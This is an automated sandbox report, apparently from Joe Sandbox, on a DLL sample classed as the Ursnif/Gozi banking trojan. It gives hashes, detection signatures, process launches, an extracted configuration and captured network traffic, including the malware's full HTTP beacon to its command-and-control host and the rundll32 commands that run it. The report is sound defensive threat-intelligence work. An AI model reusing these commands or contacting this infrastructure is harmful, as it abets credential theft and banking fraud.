
Analysis Report plushaaf

Overview

General Information

Sample Name: plushaaf (renamed file extension from none to dll)
Analysis ID: 288964
MD5: a4aa5f69df4a8c36f28e8207c5b1fea7
SHA1: 59230dbb70126eae831cae6ef10155884f6f2a67
SHA256: 06dd35ce0c9b164f9ecafc4269d91fb8a23634d541ec455dfcd4dcd624523f4b
Tags: dll, gozi, isfb, ursnif


Detection

Ursnif
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Creates a COM Internet Explorer object
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4848 cmdline: loaddll32.exe 'C:\Users\user\Desktop\plushaaf.dll' MD5: 6A3082E6152C823BF9EB895EA06EA605)
    • rundll32.exe (PID: 6768 cmdline: C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 160 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Eachtrue MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1100 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Fellhard MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2712 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Locategun MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5260 cmdline: rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Maincontinent MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 3564 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4704 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3564 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250155", "uptime": "256", "system": "6628654b458301cf506f0279b6410f5b", "size": "0", "crc": "1", "action": "00000000", "id": "2200", "time": "1600876544", "user": "f73be0088695dc15e71ab15c39bc2cb6", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://api10.laptok.at/api1/H1rxT0elUU5O4LYFSO/5JdbM_2Bb/IeW0aqIR0qWJKLwQPUNv/4YA1wfOKCw4uK_2FBc3/ov | Avira URL Cloud: Label: malware
Found malware configuration
Source: rundll32.exe.6768.1.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250155", "uptime": "256", "system": "6628654b458301cf506f0279b6410f5b", "size": "0", "crc": "1", "action": "00000000", "id": "2200", "time": "1600876544", "user": "f73be0088695dc15e71ab15c39bc2cb6", "hash": "0x00000000", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 7%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00AE57FE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5915A0 FindFirstFileExA,1_2_6E5915A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_012757FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_012757FE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033D57FE Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_033D57FE

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: Joe Sandbox View | IP Address: 8.208.101.13
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected:
  GET /api1/H1rxT0elUU5O4LYFSO/5JdbM_2Bb/IeW0aqIR0qWJKLwQPUNv/4YA1wfOKCw4uK_2FBc3/ov1xSHx6SdYcmol5Kv76OU/aK_2FLVwPBg49/8yDnBmfe/W3Q77E7hq_2Fz5zB5WNabEU/W_2BgBDPQ2/XwDNVmEPWkTUOyX45/FtWMM1S3Mlb5/q57ZgbU9UCc/zIn2pTu5MlT1YU/IevW40wth8AGgEe5uqNZm/rJqyOa3p9D26E63r/_2FRfKV3VeKxm_2/Fj0hJ9quz0FmoYr8zt/_0A_0DnZh/UpYnGnJt442sl5zeHrXp/_2FENWuhtD_2FoAL6rK/z0yNekWHZ89LREkTZPhi_2/BdyvujvpJ/M HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: msapplication.xml1.21.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x135fa748,0x01d691c2</date><accdate>0x135fa748,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.21.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x135fa748,0x01d691c2</date><accdate>0x135fa748,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.21.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.21.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.21.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.21.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x13646beb,0x01d691c2</date><accdate>0x13646beb,0x01d691c2</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 23 Sep 2020 06:55:48 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {3D0C201C-FDB5-11EA-90E2-ECF4BB862DED}.dat.21.dr, ~DF281A5094B7740677.TMP.21.dr | String found in binary or memory: http://api10.laptok.at/api1/H1rxT0elUU5O4LYFSO/5JdbM_2Bb/IeW0aqIR0qWJKLwQPUNv/4YA1wfOKCw4uK_2FBc3/ov
Source: msapplication.xml.21.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.21.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.21.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.21.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.21.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.21.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.21.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.21.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | File source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E541613 GetProcAddress,NtCreateSection,memset,1_2_6E541613
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E541FFC NtMapViewOfSection,1_2_6E541FFC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5424D5 NtQueryVirtualMemory,1_2_6E5424D5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE143A NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,1_2_00AE143A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEB115 NtQueryVirtualMemory,1_2_00AEB115
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0127143A NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_0127143A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0127B115 NtQueryVirtualMemory,2_2_0127B115
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033D143A NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_033D143A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033DB115 NtQueryVirtualMemory,3_2_033DB115
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5422B4 1_2_6E5422B4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEAEF4 1_2_00AEAEF4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE639D 1_2_00AE639D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5695F0 1_2_6E5695F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E574C00 1_2_6E574C00
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E56AA10 1_2_6E56AA10
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0127639D 2_2_0127639D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0127AEF4 2_2_0127AEF4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033D639D 3_2_033D639D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033DAEF4 3_2_033DAEF4
Source: plushaaf.dll | Binary or memory string: OriginalFilename wood.dll0 vs plushaaf.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: sfc.dll (5 identical entries, one per rundll32.exe instance)
Source: classification engine | Classification label: mal80.bank.troj.winDLL@14/23@1/1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AE16E8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00AE16E8
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\Low
Source: plushaaf.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\plushaaf.dll'
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Eachtrue
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Fellhard
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Locategun
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Maincontinent
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3564 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\rundll32.exe 'C:\Users\user\Desktop\plushaaf.dll',DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Eachtrue
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Fellhard
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Locategun
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\plushaaf.dll,Maincontinent
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3564 CREDAT:17410 /prefetch:2
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK (4 identical entries)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: plushaaf.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: plushaaf.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: e:\5\Skin\like\Picture\experiment\2\Atom\69\89\21\Good\65\string\35\our\wood.pdb source: rundll32.exe, 00000001.00000002.633302638.000000006E5A3000.00000002.00020000.sdmp, plushaaf.dll
Source: plushaaf.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: plushaaf.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: plushaaf.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: plushaaf.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: plushaaf.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E542250 push ecx; ret 1_2_6E542259
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E54E67F push 00000038h; retf 1_2_6E54E681
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E54EFCD pushfd ; iretd 1_2_6E54EFCE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E54E998 push 65882003h; ret 1_2_6E54E99D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5422A3 push ecx; ret 1_2_6E5422B3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEE895 push 00000038h; retf 1_2_00AEE897
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEAEE3 push ecx; ret 1_2_00AEAEF3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEE6C6 push ebp; ret 1_2_00AEE6C7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEABB0 push ecx; ret 1_2_00AEABB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00AEE548 push esi; retf 1_2_00AEE549
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5C2609 push ds; iretd 1_2_6E5C260A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5C2F42 push ebp; iretd 1_2_6E5C2F98
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_6E5C2F2D push edx; retf 1_2_6E5C2F2E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0127ABB0 push ecx; ret 2_2_0127ABB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0127AEE3 push ecx; ret 2_2_0127AEF3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033DABB0 push ecx; ret 3_2_033DABB9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_033DAEE3 push ecx; ret 3_2_033DAEF3

Hooking and other Techniques for Hiding and Protection:

            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.549314846.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549441355.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549287062.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549382541.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549424354.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549246941.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549408026.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.632769981.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.549346678.0000000005518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E56AA10 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_6E56AA10
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
